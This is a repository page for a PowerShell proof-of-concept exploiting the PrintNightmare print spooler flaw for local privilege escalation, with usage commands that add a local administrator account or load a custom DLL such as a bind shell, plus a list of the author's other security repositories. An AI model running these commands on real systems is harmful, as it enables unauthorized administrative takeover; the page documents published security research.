JohnHammond/CVE-2021-34527 JohnHammond/CVE-2021-34527

  • Stars
    star
    222
  • Rank 172,939 (Top 4 %)
  • Language
    PowerShell
  • Created almost 3 years ago
  • Updated almost 3 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
JohnHammond/CVE-2021-34527
github

JohnHammond

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

CVE-2021-34527 - PrintNightmare LPE (PowerShell)

Caleb Stewart | John Hammond | June 1, 2021

UPDATE June 2 2021: Microsoft has released an advisory on CVE-2021-34527, correctly terming that specific identifier as the PrintNightmare vulnerability exploit. Previously, the community was assuming CVE-2021-1675 "was PrintNightmare" as the June 8 path did not resolve this issue. This repository is identical to the original just with the different CVE name.

CVE-2021-34527 is a critical remote code execution and local privilege escalation vulnerability dubbed "PrintNightmare."

Proof-of-concept exploits have been released (Python, C++) for the remote code execution capability, and a C# rendition for local privilege escalation. We had not seen a native implementation in pure PowerShell, and we wanted to try our hand at refining and recrafting the exploit.

This PowerShell script performs local privilege escalation (LPE) with the PrintNightmare attack technique.

image

This has been tested on Windows Server 2016 and Windows Server 2019.

Usage

Add a new user to the local administrators group by default:

Import-Module .\cve-2021-34527.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default

Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"

Supply a custom DLL payload, to do anything else you might like.

Import-Module .\cve-2021-34527.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"

Details

  • The LPE technique does not need to work with remote RPC or SMB, as it is only working with the functions of Print Spooler.
  • This script embeds a Base64-encoded GZIPped payload for a custom DLL, that is patched according to your arguments, to easily add a new user to the local administrators group.
  • This script embeds methods from PowerSploit/PowerUp to reflectively access the Win32 APIs.
  • This method does not loop through all printer drivers to find the appropriate DLL path -- it simply grabs the first driver and determines the appropriate path.

More Repositories

1

ctf-katana

This repository aims to hold suggestions (and hopefully/eventually code) for CTF challenges. The "project" is nicknamed Katana.
2,371
star
2

msdt-follina

Codebase to generate an msdt-follina payload
Python
1,600
star
3

katana

Katana - Automatic CTF Challenge Solver in Python3
Python
1,211
star
4

poor-mans-pentest

This a collection of the code that I have written for the Poor Man's Pentest presentation.
Shell
540
star
5

security-resources

A communal outpouring of online resources for learning different things in cybersecurity
379
star
6

vbe-decoder

A Python3 script to decode an encoded VBScript file, often seen with a .vbe file extension
Python
176
star
7

oscp-notetaking

This repository houses some of the small scripts I had used to quickly document throughout my OSCP course. This was referenced on YouTube, and should be made available to others!
Shell
174
star
8

ignition_key

This is a small BASH script to quickly setup all the tools I would want and need on a new machine.
Shell
137
star
9

labs

Free and publicly available training labs and exercises, for quick copy-and-paste demonstrations, learning and education.
111
star
10

active_directory

Notes and resources for the Active Directory YouTube series on https://youtube.com/JohnHammond010
PowerShell
111
star
11

johnhammond.org

The code and material for my personal open-source website. (Flask, Gunicorn, Certbot)
HTML
72
star
12

archlinux

These are my notes and setup scripts while installing and preparing my Arch Linux environment.
Shell
70
star
13

pyminify

Compress a Python script to a command-line one-liner
Python
66
star
14

intro2linux

This is a clone of the of Introduction To Linux repo that I developed for the class I taught at the US Coast Guard Academy.
Python
63
star
15

thm

My adhoc and abhorrent notes and work for TryHackMe machines. This repository is for personal use but is made public in case other somehow benefit from it.
PowerShell
56
star
16

binnim

Shitty Nim code that reads in a file and converts it into \x hex representation, for the use of shellcode binaries.
Nim
43
star
17

c2c2

My new C2 framework
39
star
18

htbbizctf2021

Code and notes for the 2021 HackTheBox Business CTF
PowerShell
38
star
19

CVE-2012-2982

A Python replicated exploit for Webmin 1.580 /file/show.cgi Remote Code Execution
Python
38
star
20

notes

An Obsidian vault to Github Pages workflow to hopefully make me take notes
36
star
21

wfi

Windows File Integrity -- an archive of information on installed Windows binaries.
28
star
22

misfortune-ctf-challenge

A small binary exploitation challenge to demonstrate a typical return2libc attack
Dockerfile
28
star
23

netstatgo

Crappy Golang code to list local listening ports and their associated processes.
Go
27
star
24

overthewire_natas_solutions

As requested on YouTube, this is an archive of my Python scripts and code that I've used to solve the Natas challenges from OverTheWire.
Python
25
star
25

underthewire

These are notes and code from my experience working through the UnderTheWire wargames.
PowerShell
24
star
26

hackersyntax

Shell
23
star
27

training_wheels-public

The teaching vessel and "interactive textbook" that I am building for the Intro to Linux class at the USCGA.
Python
22
star
28

fakemsf

Fake msfconsole for the use in demonstrations
Ruby
21
star
29

CVE-2020-35846

Python PoC for CVE-2020-35846 targeting Cockpit 0.11.1
Python
16
star
30

devops

16
star
31

CVE-2021-4034

Bash implementation of CVE-2021-4034
16
star
32

sshkeys

A weaponized technique for SSH to accept an inserted public/private key. Useful for red team effects.
15
star
33

pcdc2019

This is a repository to house convenient things for the 2019 PCDC competition.
Shell
14
star
34

bbfuzzer

Nightmare code I wrote and used for the Cyberstakes 2016 Breaking Binaries challenge. Managed to crack a good 200+ programs, though, more than any other team! This is the catalyst to a better utility: peach.
Python
11
star
35

cipherplane

This Python code will quickly find duplicates or similarities in sets of data.
Python
11
star
36

sandbox

My 1/c Senior Design project (at least the first half of it), aiming to synthesize virtualization and automation. I take advantage of VMware vCenter and PowerCLI to automate the process of creating a dynamic network.
Python
10
star
37

autoctfd

This is a poor-mans framework to automate the creation of a CTFd instance, dynamically recreating challenges and the interface.
10
star
38

pim

"...my own endeavor to learn low-level programming and develop a kernel or operating system". I have not touched this in years and I consider it inactive at the current moment.
Shell
7
star
39

primefac_fork

a crappy "hack" or fork of the Python module primefac, but with a different modular inverse function
Python
4
star
40

bearshop

The online "Cadet Store" that my classmates asked me to build
Python
4
star
41

stix-attack-flow

Crappy code to work with MITRE Attack Flows with the stix2 Python library
Python
4
star
42

fake_cdx_forum

This is the fake website forum I created in JavaScript before CDX 2017.
HTML
4
star
43

cdx_2016

Relics and artifacts from the CDX 2016 exercise that should help us prepare for the future
Python
3
star
44

circle

This is a testbed for CircleCI
PowerShell
3
star
45

go-for-blaine

2
star